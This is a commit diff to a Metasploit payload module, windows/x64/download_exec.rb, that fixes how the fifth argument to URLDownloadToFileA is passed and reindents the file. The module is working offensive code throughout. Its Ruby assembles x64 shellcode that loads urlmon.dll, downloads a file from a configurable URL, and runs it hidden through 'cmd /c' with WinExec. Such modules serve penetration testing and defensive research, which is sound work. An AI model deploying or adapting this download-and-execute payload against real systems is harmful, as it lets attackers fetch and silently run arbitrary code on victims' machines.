fix 5th arg for URLDownloadToFileA

xHector1337 · web-flow · commit 034459186388 · 2025-07-16T11:35:35.000+03:00
diff --git a/modules/payloads/singles/windows/x64/download_exec.rb b/modules/payloads/singles/windows/x64/download_exec.rb
@@ -4,126 +4,128 @@
 ##
 
 module MetasploitModule
-  include Msf::Payload::Single
-  include Msf::Payload::Windows
-  include Msf::Payload::Windows::BlockApi_x64
 
-  def initialize(info = {})
-    super(
-      update_info(
-        info,
-        'Name' => 'Windows Download Execute',
-        'Description' => 'Downloads and executes the file from the specified url.',
-        'Author' => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
-        'License' => MSF_LICENSE,
-        'Platform' => 'win',
-        'Arch' => ARCH_X64
-      )
-    )
+    include Msf::Payload::Single
+    include Msf::Payload::Windows
+    include Msf::Payload::Windows::BlockApi_x64
+
+    def initialize(info = {})
+        super(
+            update_info(
+                info,
+                'Name' => 'Windows Download Execute',
+                'Description' => 'Downloads and executes the file from the specified url.',
+                'Author' => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
+                'License' => MSF_LICENSE,
+                'Platform' => 'win',
+                'Arch' => ARCH_X64
+            )
+        )
+
+        display_options = ['HIDE', 'SHOW']
 
-    display_options = %w[HIDE SHOW]
+        register_options(
+            [
+                OptString.new('URL', [true, 'The url to download the file from.', 'https://i.pinimg.com/736x/dd/89/7b/dd897badebe41af82f7b0a7a64be3272.jpg']),
+                OptString.new('FILEPATH', [true, 'The path to save the downloaded file.', 'fox.jpg']),
+                OptEnum.new('DISPLAY', [true, 'The Display type.', display_options[0], display_options])
+            ]
+        )
+        end
 
-    register_options(
-      [
-        OptString.new('URL', [true, 'The url to download the file from.', 'https://i.pinimg.com/736x/dd/89/7b/dd897badebe41af82f7b0a7a64be3272.jpg']),
-        OptString.new('FILEPATH', [true, 'The path to save the downloaded file.', 'fox.jpg']),
-        OptEnum.new('DISPLAY', [true, 'The Display type.', display_options[0], display_options])
-      ]
-    )
-  end
+    def generate(_opts={})
 
-  def generate(_opts = {})
-    url =  datastore['URL'] || 'https://i.pinimg.com/736x/dd/89/7b/dd897badebe41af82f7b0a7a64be3272.jpg'
-    file = datastore['FILEPATH'] || 'fox.jpg'
-    display = datastore['DISPLAY'] || 'HIDE'
+        url =  (datastore['URL'] || 'https://i.pinimg.com/736x/dd/89/7b/dd897badebe41af82f7b0a7a64be3272.jpg')
+        file = (datastore['FILEPATH'] || 'fox.jpg')
+        display = (datastore['DISPLAY'] || 'HIDE')
 
-    payload = %^
+
+        payload = %^
             cld
-            and rsp, -16
+            and rsp, -16 
             call main
             #{asm_block_api}
 
         main:
-            pop rbp
+            pop rbp  
             call LoadLibrary
             db "urlmon.dllK"
             ; V, is this the land of do-as-you-please?
 
         LoadLibrary:
             pop rcx ; rcx points to the dll name.
             xor byte [rcx+10], 'K' ; null terminator
-            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll','LoadLibraryA')}
             call rbp ; LoadLibraryA("urlmon.dll")
             ; To live alone one must be an animal or a god, says Aristotle. There is yet a third case: one must be both--a philosopher.
-
+        
         SetUrl:
             call SetFile
             db "#{url}A"
             ; The Sound of Silence maybe a Careless Whisper?
-
+        
         SetFile:
-            pop rdx ; 2nd argument
+            pop rdx ; 2nd argument 
             xor byte [rdx+#{url.length}], 'A' ; null terminator
             call UrlDownloadToFile
             db "#{file}C"
             ; Never compromise not even in the face of armageddon.
-
+            
         UrlDownloadToFile:
             pop r8 ; 3rd argument
             xor byte [r8+#{file.length}], 'C' ; null terminator
             xor rcx,rcx ; 1st argument
             xor r9,r9   ; 4th argument
-            push rcx    ; 5th argument
-            sub rsp, 8  ; stack alignment
-            mov r10d, #{Rex::Text.block_api_hash('urlmon.dll', 'URLDownloadToFileA')}
+            mov qword [rsp+0x30], rcx ; 5th argument
+            mov r10d, #{Rex::Text.block_api_hash('urlmon.dll','URLDownloadToFileA')}
             call rbp
             ; I can see the sun, but even if I cannot see the sun, I know that it exists. And to know that the sun is there - that is living.
-
+        
         SetCommand:
             call Exec
             db "cmd /c #{file}F"
-
+        
         Exec:
             pop rcx ; 1st argument
-            xor byte [rcx+#{file.length + 7}], 'F' ; null terminator
-            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')}
+            xor byte [rcx+#{file.length + 7 }], 'F' ; null terminator 
+            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll','WinExec')}
             xor rdx, rdx ; 2nd argument
         ^
 
-    if display == 'HIDE'
-      hide = %(
+        if display == 'HIDE'
+            hide = %^
             call rbp
             ; I am vengeance! I am the night! I am Batman!
-            )
-      payload << hide
+            ^
+            payload << hide
 
-    elsif display == 'SHOW'
-      show = %(
+        elsif display == 'SHOW'
+            show = %^
             inc rdx ; SW_NORMAL = 1
             call rbp
             ; It's our only home. Our heaven and our hell. This is Outer Heaven.
-            )
-      payload << show
-    end
+            ^
+            payload << show
+        end
 
-    if datastore['EXITFUNC'] == 'process'
-      exit_asm = %(
+        if datastore['EXITFUNC'] == 'process'
+            exit_asm = %^
             xor rcx,rcx
-            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
+            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll','ExitProcess')}
             call rbp
-            )
-      payload << exit_asm
-
-    elsif datastore['EXITFUNC'] == 'thread'
-      exit_asm = %(
+            ^
+            payload << exit_asm
+        
+        elsif datastore['EXITFUNC'] == 'thread'
+            exit_asm = %^
             xor rcx,rcx
-            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
+            mov r10d, #{Rex::Text.block_api_hash('kernel32.dll','ExitThread')}
             call rbp
             ; She walks in beauty, like the night...
-            )
-      payload << exit_asm
-    end
+            ^
+            payload << exit_asm
+        end    
 
-    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
-  end
+        Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
+    end
 end
